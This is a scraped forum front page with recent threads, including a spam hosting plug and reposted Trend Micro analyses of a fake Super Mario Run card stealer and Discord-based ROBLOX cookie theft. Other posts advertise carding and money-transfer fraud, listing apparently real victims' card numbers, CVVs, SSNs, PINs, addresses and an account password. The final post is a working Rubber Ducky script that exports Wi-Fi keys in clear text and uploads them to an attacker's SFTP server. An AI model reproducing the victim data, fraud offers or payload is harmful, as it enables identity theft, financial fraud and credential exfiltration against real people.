Welcome, Guest
You have to register before you can post on our site.

Username/Email:
  

Password
  





Search Forums



(Advanced Search)

Forum Statistics
» Members: 120
» Latest member: L3GITTRANSF3R
» Forum threads: 125
» Forum posts: 153

Full Statistics

Online Users
There are currently 11 online users.
» 0 Member(s) | 9 Guest(s)
Bing, Google

Latest Threads
Are You looking for easy ...
Forum: advertising
Last Post: Shane_Black
02-14-2019, 12:48 PM
» Replies: 0
» Views: 15
We are a group of Canada ...
Forum: My Forum
Last Post: DeaNobe
02-13-2019, 02:12 AM
» Replies: 0
» Views: 20
Download Free SHAREit for...
Forum: My Forum
Last Post: Jasmn18
02-12-2019, 04:47 AM
» Replies: 0
» Views: 11
zap-hosting.com
Forum: Games
Last Post: GrimGaming
02-09-2019, 09:30 PM
» Replies: 0
» Views: 16
FRESH ! FRESH !! FRESH AN...
Forum: advertising
Last Post: seriousOnly1
02-04-2019, 12:02 PM
» Replies: 0
» Views: 33
thinking
Forum: memes
Last Post: alexxk5111
01-31-2019, 12:08 PM
» Replies: 0
» Views: 41
How Chat App Discord Is A...
Forum: Developer
Last Post: JeramiahGamingYT
01-04-2019, 10:48 PM
» Replies: 1
» Views: 158
Fake Super Mario Run App ...
Forum: Developer
Last Post: alexxk5111
01-04-2019, 01:50 PM
» Replies: 0
» Views: 60
Malware cleverly weaponiz...
Forum: Developer
Last Post: alexxk5111
01-04-2019, 01:25 PM
» Replies: 0
» Views: 45
Payload WiFi key grabber
Forum: Rubber Ducky Scripts
Last Post: alexxk5111
12-30-2018, 11:48 PM
» Replies: 0
» Views: 58

 
Thumbs Down Are You looking for easy way to make money and you want to be a billionaire ?
Posted by: Shane_Black - 02-14-2019, 12:48 PM - Forum: advertising - No Replies

Are You looking for easy way to make money and you want to be a billionaire ? then simply stay connected with US We started all Our stuff first deal on low rates to build trust with each other .  We have big experience in Western Union Transfer , Bank Transfer, Paypal  transfers . My rates are fixed so no negotiationin terms of prices . Please Never ask me for test transfers or etc. We dont sell CC , Dumps or fullz etc so dont add US in your contact list if you need those data......

First of all i want to clear one thing that i dont work for percentage % , so please dont waste Our time and yours too for asking % partnership , because we are happy with Our work and We dont want to lost my time in this kind of proposals .


!!!! CONTACT ID !!!!

TELEGRAM ID: @KellyWalter


icq: 666615253

Email: [email protected]




For Western Union Transfer Info Needed :-

1: First Name
2: Last Name
3: City
4: Country
5: Email for confirmation?

Western Union Transfering Worldwide.

You will get MTCN code + Sender info + amount and then you can pickup from any WU store office.

Note: Only 1 time transfer on 1 name in a week , if you need daily transfers then you must have to use more names .

Western Union Transfer Rates :

For $1000 Transfer = $100

For $2000 Transfer = $250

For $3000 Transfer = $350

For $4000 Transfer = $500

For $5000 Transfer = $600

For $7000 Transfer = $700

For $10000 Transfer = $1000 <== MTCN split code into 2 parts - $5000+$5000


Rules For Bank Transfer :

For bank transfer you will provide me your bank info and i will transfer funds into your account within time limit as we promised . I will only do one transfer in a week on one bank account . If you need more transfers then arrange more bank accounts .

I`m Specially Transferring From These Countries:

(US,UK,IN,GM,NL,AU,CA,DM,CH,BN,IT,MX,RU)?

Bank Transfer Rates:

For $1500 transfer = $200

For $2000 Transfer = $250

For $3500 Transfer = $450

For $5000 Transfer = $600

For $7000 Transfer = $700

Info needed for Bank transfers :-

1: Bank name
2: Bank address
3: Zip code
4: Account Holder
5: Account number
6: Account Type
7: Routing number

Bank transfer will take maximum 8hour for money to Reflect in your bank account.


Paypal Transfer :-

Using hacked and verified paypal accounts to transfer paypal money into  your paypal account . Im doing paypal transfer to myself  safety first and I want Share my skills with buyers and customers On here too so that all of us here can make each other Rich here, So you dont have any headache to clean the money because its already clean when i transfer it into my account .

Paypal Transfer Rates :

For $1500 transfer = $120

For $2000 Transfer = $200

For $3500 Transfer = $300

For $5000 Transfer = $400

For $7000 Transfer = $500

    
!!!! CONTACT ID !!!!

TELEGRAM ID: @KellyWalter


icq: 666615253

Email: [email protected]



=====<< I need a Good person and also a Good customer to deal with ..  I want to make you rich as you will also make the same to me <<===== I ACCEPT BITCOIN AND PERFECT MONEY ONLY!!!!


Thumbs Up We are a group of Canada hackers,We will share with you all what we have and you too.
Posted by: DeaNobe - 02-13-2019, 02:12 AM - Forum: My Forum - No Replies

We are a group of Canada hackers,We will share with you all what we have and you too.Please No bargain,work quickly.
- Our online support only to serious customer....  


- I'm work business , professional and quality.
- I have info ssn dob ( name + address + city + state + phone + ssn + dob )
- If you need CVV please let me know the bins u need so that i will skim for u
- I'm best and always sell CC fresh with high balance.

=============== MY CONTACT =====================

* My TeleGram :  @WiggiCucci

* Contact me via ICQ Address: 707049127

* Ymail : [email protected]


-------------Sell Cvv (credit card) --------
* Cvv with country us,uk,ca,au
List cc i have and price i have :
--------Any Country
(visa,master) = 8$
(amex,discover) = 10$
(bin) = 15$
(dob) = 20$
(fullz) = 30$


-------------------Fullz INfos Formate-------------------------

FirstName: ******
LastLame: ***********
Address: ****************
City:********
State: **
Email: **********
CardType: ******
ZipCode: *****
Country: *******
SSN: ********
DOB: ** ** ****

i have sell info same last name

-|178517|275-72-6988|04/27/1973|Michael|O|Williams|W|M|6|0|190|HAZ|RU393939|2 000| OH |2334 Crossland Ct|Dayton|45404|
-|8085|Adam|R|Ward|638126402|102583|19382751|414|am berdale oak|san antonio|tx|78249|8326595524|[email protected] u|

===================== Western Union RATES ==============================

[$3500 Western Union] for [ $300 Bitcoin or Perfect Money]
[$65000 Western Union] for [ $600 Bitcoin or Perfect Money]
[$9500 Western Union] for [ $900 Bitcoin or Perfect Money]
[$18000 Western Union] for [ $1200 Bitcoin or Perfect Money]

You will receive MTCN and other transaction codes in few minutes after confirmed payment because I will do transfer ONLINE.... Less then 20mins


Name sender : Jamel johnson
MTCN : 3434304668 / 8973628030 (same name sender)
And orther MTCN : 0448746596 + 3033978004 + 9035112719 .....and more....

--------------------- Login Bank (all bank )------------------
=============== Bank BOA Us ======================
1 . Balance 7000$ = 300$
2 . Balance 14000$ = 500$
3 . Balance 18000$ = 800$
=============== Bank HSBC US ====================
And have more Bank account login with more country , If u really want to buy and make business with me just contact me now .

-------------- Price for dumps and track 1 & 2 -------------
- Tracks 1&2 US = 50$ per 1
- Tracks 1&2 UK = 60$ per 1
- DUmps
- Track1 =5510701913336108^LAIOSA/STEPHEN^15031010000000951000000344
- Track2 =5510701913336108=15031011204003440000 : pin 03xx
- pin: 5678,5432,5187,5505...,and other many pin

USA:101
MasterCard Standard, Visa Classic - $50
Visa Gold|Platinum|Corporate|Signature|Business ? $60
American Express - $50
Discover - $60
-CANADA:101 201
MasterCard, Visa Classic - $80
Visa Gold|Platinum|Corporate|Signature|Business - $90

-------------- My Business Regulations ---------------------------
- I can do make wu transfer very good and speed.
- I promise cc of me very good and fresh all with good price .
- If cc not good then i don`t sell
- Thanks for reading my thread .
- Hope you are better customer and we can to work a long time.

-------------- Contacts Info ----------------------

* My TeleGram :  @WiggiCucci

* Contact me via ICQ Address: 707049127

* Ymail : [email protected]

== --------------THANKS, LOOK FORWARD TO WORKING WITH YOU ALL ---------------


  Download Free SHAREit for PC/Laptop [Windows 7/8/8.1/10] - ShareIt For PC
Posted by: Jasmn18 - 02-12-2019, 04:47 AM - Forum: My Forum - No Replies

SHAREit is one of the simplest and easy to use data sharing apps that has made it easy for you transfer number of files in just a few seconds. You now don’t need to worry about the size and format of the data file search the device to which you are willing to share your desired file using WiFi direct and initiate sharing data without paying any charges for that. With the various inbuilt features and easy to use interface, SHAREit has made it very easy to transfer larger files such as movies or programs as well 40 times much faster than that of Bluetooth.
https://shareitpc.info/

SHAREIT FOR MAC


  zap-hosting.com
Posted by: GrimGaming - 02-09-2019, 09:30 PM - Forum: Games - No Replies

This Is where you can rent your own server on any game they have lots of games to rent and have fun it is very useful i recommend this to you guys.
zap-hosting.com


Thumbs Up FRESH ! FRESH !! FRESH AND VALID FULLZ AND CREDIT CARDS IS UPDATE HERE
Posted by: seriousOnly1 - 02-04-2019, 12:02 PM - Forum: advertising - No Replies

FRESH ! FRESH !! FRESH AND VALID FULLZ AND CREDIT CARDS IS UPDATE HERE 

I HAVE GOT FRESH FULLZ WITH GOOD BALANCE AND I ALSO PROVIDE ALL THE DETAILS OF THE FULLZ

INFORMATION OF MY FULLZ

First Name : Kathryn
Middle Name : M
Last Name : Ratledge
Spouse Name : Ruth Ratledge
Father Name : Thomas Ratledge
Billing Address : 9 Ridgewood Dr
City : Greenville
State : CA
Zip Code : 29615
Country : US
Phone Number : 15629234492
Credit Card Information :
*********
Card Type : Credit
Credit Card Number : 4737033009002349
Exp. Date : 02/18
Name On Card : Kathryn Ratledge
Cvv2 : 736
ATM Pin: 5910
Bank Name : Bankk of America
Routing Number : 122000661
Account Number: 0222301305
Mother Maiden Name : Coleman
Social Security Number : 340224188
Birth Day : 19
Birth Month : 8/June
Birth Year : 1980
Account Information :
*******
AOL ID : Glendeweese 
Password : BeenThere754

I WILL GET YOU GOOD FULLZ WITH GOOD BALANCE 

COUNTIES INSTOCK NOW

* EURO
* USA
* CANADA
* UK
* ASIA
* ITALY
* GERMAN
* AND MANY MORE

YOU HIT ME AND ASK ABOUT YOUR COUNTRY TOO

I ALSO HAVE GOOD CREDIT CARD WITH GOOD BALANCE OVER HERE  

INFORMATION OF MY CREDIT CARDS

CCN
4147182090101116
CCV
197
EXP
0619
Holder info
Name
Deborah Mariotti
DOB
N/A
Phone
Address
Country
UNITED STATES
State
CA
City
Martinez
Zip
94553
address
5319 Stonehurst Drive

CCN
4833140007461733
CCV
568
EXP
0418
Holder info
Name
David Layton
DOB
N/A
Phone
7205637997
Address
Country
UNITED STATES
State
CO
City
Fraser
Zip
80442
address
PO BOX 362

COUNTIES INSTOCK NOW

* EURO
* USA
* CANADA
* UK
* ASIA

YOU CAN ALSO HIT ME UP WITH YOUR BINS 

===== >>>>   RULES    <<<<=======

*Stuffs are given to you only after payment.! NO TIME WASTING
*Stuffs  will be send to you immediately after receive your payment..
*I check my stuffs at the request of the customer
*I do not give any tests,please dont waste my time...
* Instant Delivery with BTC ( BITCOIN ) or PM ( PERFECT MONEY )

YOU CAN CONTACT ME ON ICQ TO MAKE YOUR ORDER


 Via Y!M : fullzcreditcard

 EMAIL : fullzcreditcard

 ICQ : 816185


LET WORK NOW! LET WORK NOW !! LET WORK NOW !!! ...


  thinking
Posted by: alexxk5111 - 01-31-2019, 12:08 PM - Forum: memes - No Replies

   Thinking = thinking


  Fake Super Mario Run App Steals Credit Card Information
Posted by: alexxk5111 - 01-04-2019, 01:50 PM - Forum: Developer - No Replies

Fake Super Mario Run App Steals Credit Card Information



Trend Micro has identified more malicious Android apps abusing the name of the popular mobile game Super Mario Run. We earlier reported about how fake apps were using the app’s popularity to spread; attackers have now released versions of these fake apps that steal the user’s credit card information.
Super Mario Run is a mobile game that Nintendo first released on the iOS platform in September 2016, followed by the Android version on March 23, 2017. Mobile games have always proven to be attractive lures for cybercriminals to get users to download their malicious apps and potentially unwanted apps (PUAs). This is not the first time that the name of a popular game was abused; we’ve discussed how the popularity of Pokémon Go was similarly abused.
Based on feedback from the Smart Protection Network™, we saw more than 400 of these apps in the first three months in 2017 alone. In the same time frame, we saw 34 fake apps explicitly named “Super Mario Run”—it’s a noteworthy trend, as we saw the first of these only in December 2016.
In this post we’ll discuss the behavior of a new credit card stealing variant named “Fobus” (detected as ANDROIDOS_FOBUS.OPSF).
Fobus was distributed via third-party app stores. As is the norm, it asks for various permissions:


[Image: smr-fobus-1.png]

Figure 1. Fake app requesting permissions

During the installation process, it also asks for itself to be activated as a device administrator:
 

[Image: smr-fobus-2.png]

Figure 2. Fake app requesting device administrator privileges

After it is successfully installed, it gathers sensitive information such as the user’s mobile number, contact information, location, and SMS messages from the device. The device administrator privileges allow it to hide its own icon if the user tries to run the fake app, which has the same icon as the real Super Mario Run app. This also makes uninstalling the fake app more difficult. No version of the game is actually installed.
The real purpose of this app is to steal credit card information. When Google Play is launched with this app installed, a fake screen pops up and asks the user to enter their credit card information. Even if user tries to click on the grayed out area in the background, the pop-up cannot be closed; the user has no choice but to access Google Play by providing credit card information into the field.

[Image: smr-fobus-3.png]

Figure 3. Pop-up when opening Google Play

The app goes as far as to check if the entered card number is a valid one. The first six digits identifies the issuing network of the card (i.e., Visa, Mastercard, etc.), and the app displays the logo of the appropriate network. It also uses the Luhn algorithm to check if the number is valid. If an invalid number is entered, it displays an error message saying “Incorrect credit card number”.

[Image: smr-fobus-4a.png]

Figure 4. Verification of credit card number

If a valid card number is entered, the app then displays additional fields asking for the card holder’s name, the card’s expiration date, and security code—information that is located on the card itself.

[Image: smr-fobus-5.png]

Figure 5. Request for additional card information

When the user completes this information, it will ask for even more information, this time related to the user: the user’s birthday, address, and phone number. After entering all the information, the user can finally access Google Play.

[Image: smr-fobus-6.png]

Figure 6. Request for additional user information

The app also allowed a remote attacker to reset the device’s PIN; this was done via commands issued by a command-and-control (C&C) server. This allowed an attacker to lock the user out of their own device. This C&C server also receives the credit card information stolen from the user in the previous steps.


Mitigation


Cybercriminals frequently take advantage of popular and hotly anticipated titles to push their own malicious apps. These are usually distributed via third-party app stores. Some users may utilize such app stores to download “unreleased” versions of legitimate apps, or to obtain apps for free. These apps are illegitimate in the first place, and the risks to end users are quite high. We strongly advise that users download and install apps only from legitimate app stores such as Google Play or trusted third-party app store.


In other cases, an attacker may even provide a fake app store that resembles Google Play. Alternately, a message supposedly from a friend sent via social media may lead to a malicious app. Disabling the “Allow installation of apps from unknown sources” setting prevents apps inadvertently downloaded these ways from being installed. By default, this setting is set to off. Only turn it on if you know you are installing an app from a trusted third-party app store.
To carry out malicious behavior such as installing other apps on the user’s device without any user input and consent, or hiding icons and processes, an app needs device administrator privileges. Legitimate apps seldom require these; users should double check whenever an app asks for them. This is particularly true of games, which do not require device administrator privileges. A “game” asking for these privileges is likely to be malicious or a PUA.


Trend Micro solutions


Users should only install apps from the Google Play or trusted third-party app stores and use mobile security solutions such as Trend Micro™ Mobile Security to block threats from app stores before they can be installed and cause damage your device or data.
Enterprise users should consider a solution like Trend Micro™ Mobile Security for Enterprise. This includes device management, data protection, application management, compliance management, configuration provisioning, and other features so employers can balance privacy and security with the flexibility and added productivity of BYOD programs.


  How Chat App Discord Is Abused by Cybercriminals to Attack ROBLOX Players
Posted by: alexxk5111 - 01-04-2019, 01:39 PM - Forum: Developer - Replies (1)

How Chat App Discord Is Abused by Cybercriminals to Attack ROBLOX Players










[img=200x0]https://blog.trendmicro.com/trendlabs-security-intelligence/files/2016/09/feature_vul-200x200.jpg[/img]Cybercriminals targeting gamers are nothing new. We’ve reported many similar incidents in the past, from fake game apps to real-money laundering through online game currencies . Usually the aim is simple: to steal personal information and monetize it. And usually, for that purpose the game itself is abused.
In the particular scenario we are describing in this blog post, however, it is not the game that is being abused by the cybercriminals, but rather one of the communication tools used by the game players. We’re referring to Discord, a new-generation chat platform that gamers frequently use, with a user base of more than 45 million registered members.

ROBLOX

This attack scenario involves ROBLOX, a highly popular massively multiplayer game with more than 178 million registered accounts and more than 12 million monthly active users. ROBLOX relies heavily on user-created content to thrive; it allows its players to create their own mini games and environments within the ROBLOX game world that other players can then play and share. ROBLOX also has a social networking element that encourages users to socialize, play and create content together, and take part in the earning and spending of ROBUX — the game’s own virtual currency that can be traded for real cash.

The Devious Vulnerability in Discord

How does Discord figure into the modus operandi of cybercriminals in attacking ROBLOX players? Through our research, we have discovered that cybercriminals are abusing a built-in feature of the chat platform — namely, its application programming interface (API), which enables it to run user-created code and apps. In doing so, cybercriminals can steal browser cookies containing ROBLOX login credentials from a targeted system that also uses Discord. More specifically, the feature being abused is the ability of Discord to use webhooks. A webhook, simply put, is a feature that allows the chat program to send a message to a specified channel or user when a certain requirement of a specified app or program is fulfilled. In this manner, Discord is really being used as an information exfiltration channel.
This particular abuse method using webhooks can be broken down into the following steps:

  1. The targeted system is infected with malware – in this case, one that Trend Micro detected as TSPY_RAPID.A. It was originally seen on a gaming forum, where the user who posted it claimed it was a “cheat application” that would allow players to modify their characters and therefore gain unfair advantage over other players. This malware has a Discord webhook coded into it, as shown below (SHA256: a983e78219bf3c711c21c7dc23f03dca621ed5861578a8848a954ad9ac9f20e5.)
[Image: Figure01_api.jpg]
Figure 1. Screenshot of malware code with Discord webhook appended at the end

  1. The malware waits until it detects ROBLOX in the victim system. Once it does, it steals the user’s game account cookie.

  2. The malware uses Discord to send the stolen cookie to a specified channel or user also connected to Discord.

  3. The stolen cookie is then used to log into the compromised ROBLOX account to steal the ROBUX stored within, presumably to be traded for real cash.
A variant of this malware, TSPY_RAPID.D, has been detected to run persistently on the affected system, making it possible to obtain new game account cookies whenever the system executes ROBLOX (and thus rendering password changes useless). This is in contrast to TSPY_RAPID.A, which runs only once. It also replaces the ROBLOX executable with a malicious version, just as it displays a fake message informing the victim that the ROBLOX process has crashed.


[Image: Figure02_api.jpg]

Figure 2. The fake ROBLOX crash notification message box


[Image: Figure03_api.jpg]
Figure 3. Screenshot of Stolen ROBLOX browser cookie

This isn’t the only malicious routine that cybercriminals can force Discord (or any similar chat platform) to carry out by abusing its API. In fact, our analysis shows that with only some modifications, creative cybercriminals can possibly turn it into a command-and-control (C&C) infrastructure, allowing them to communicate with their malware without having to expend the resources for a home-brewed alternative.
We detailed other examples and case studies of such abuse in Discord in our in-depth research paper on the matter, titled “How Cybercriminals Abuse Chat Program APIs as Command-and-Control Infrastructure.” Users can peruse the paper to know more about this particular security issue and to learn how to address it at home and in the workplace.
Solutions and Countermeasures
The significant catch about this particular security risk involving Discord is that there is no easy solution against it. Discord’s API feature is key to how the chat platform functions, and “sanitizing” it for the purpose of protection effectively kills its functionality, thereby rendering the app useless. This presents a scenario where the only time the user is made aware of the security issue is when the attack has already taken place, and the malware is already in the system using Discord as a C&C server. For this reason, users need to consider if continuing to use the chat platform is worth the risk.
The fact that cybercriminals are targeting players of specific games in gaming forums is something to take note of, as well.
To help make the chat platform safer, we have also worked extensively with Discord to identify and remove such threats lingering in its network.
Of course, a set of best practices should always be emphasized and adopted no matter what security issue is at hand. Here are our recommendations for users of Discord (and users of any chat platform, for that matter):
  • Always keep a security solution installed and updated on your system to prevent malware infection, such as the pieces of malware cited here (TSPY_RAPID.A 

  • and TSPY_RAPID.D).

  • Never click on suspicious links, even those sent by someone on your friends list.

  • Never download any suspicious files, even those sent by someone on your friends list.

  • Never reveal any personal information over the internet, even when you’re being asked by someone in your friends list.

  • Always view messageboard posts, especially those asking you to try out cheat applications, with heavy skepticism.


  Malware cleverly weaponizes Discord to steal game currency from Roblox players
Posted by: alexxk5111 - 01-04-2019, 01:25 PM - Forum: Developer - No Replies

Malware cleverly weaponizes Discord to steal game currency from Roblox players

[Image: screen-shot-2017-03-17-at-2-720x720.jpg?ver=1.jpg]

A flaw in Discord’s Application Program Interface (API) has allowed nefarious individuals to steal login credentials for Roblox, one of the first MMOs to support VR

From there, the Robux in-game currency can be funneled into a separate account and cashed out. Although only exploitable through traditional phishing practices, the flaw does raise concerns over the integration of popular applications with games that have real-money stores.


Discord is a popular chat application often used by gamers. It has the ability to handle group VOIP (Voice Over Internet Protocol) conversations and various other social functions. While popular with Roblox players, it has proven problematic as of late due to its API’s ability to execute user-generated code and applications. Because of that, infected systems can use the tool to steal user account information from Roblox in a money-making endeavor.

The method of attack first requires that a system be infected with malware. TrendMicro found an instance of a particular infectious program masquerading as a cheat app on one forum. That malware can sink its hooks into Discord and then wait for a user to play Roblox. When they do, it steals their account cookie and then sends that file over Discord to a specified channel.

Those behind the attack can use that cookie to log into the victim’s Roblox account and summarily transfer out all of their in-game Robux, which can then be transferred out of the game and turned into actual cash.

There are even variants of the malware that persistently steal login details, making it difficult to control the damage done with a password change. What you can do to prevent such attacks in the first place is be very wary of unofficial applications that claim to have the ability to help you cheat in multiplayer games. While their use is unfair to other users, you also run the risk of infecting your system.

TrendMicro also recommends running a decent anti-malware program. It’s also good advice to keep such applications, as well as your operating system, updated. You should also be very wary of sharing credentials online, though in this instance, the exploit does it automatically for you.

It’s important to not trust any chat app too much. As TrendMicro’s other research shows, the APIs of many VOIP platforms have been leveraged heavily by hackers in recent years as their usage has grown.


  Payload WiFi key grabber
Posted by: alexxk5111 - 12-30-2018, 11:48 PM - Forum: Rubber Ducky Scripts - No Replies

Payload WiFi key grabber



Change the following things

  • "SFTPpass" : Your Sftp password
  • "SFTPusername" : Your sftp username
  • "SFTPserver" : Your sftp server address

Succesfully tested on

  • Windows 10

Info
  • Duckncoder : 1.2
  • Target : Windows 10 Machines
  • Description : Connect to sftp server and uploads WLAN passwords
DELAY 500
GUI r
DELAY 300
STRING cmd
DELAY 300
CTRL-SHIFT ENTER
DELAY 300
LEFTARROW
DELAY 100
ENTER
DELAY 300
STRING cd C:\
ENTER
DELAY 100
STRING md l
ENTER
DELAY 100
STRING cd l && @netsh wlan export profile key=clear >nul
ENTER
DELAY 1000
STRING sftp -oPort=22 **SFTPusername**@**SFTPserver**
ENTER
DELAY 1200
STRING **SFTPpassword**
DELAY 70
ENTER
DELAY 500
STRING cd wlan
ENTER
DELAY 50
STRING mput C:\l\*.xml
ENTER
DELAY 3000
STRING bye
ENTER
DELAY 200
STRING cd ..
ENTER
DELAY 50
STRING del "C:\l"
ENTER
DELAY 50
STRING j
ENTER
STRING exit
ENTER












---------------------
code ends here:
github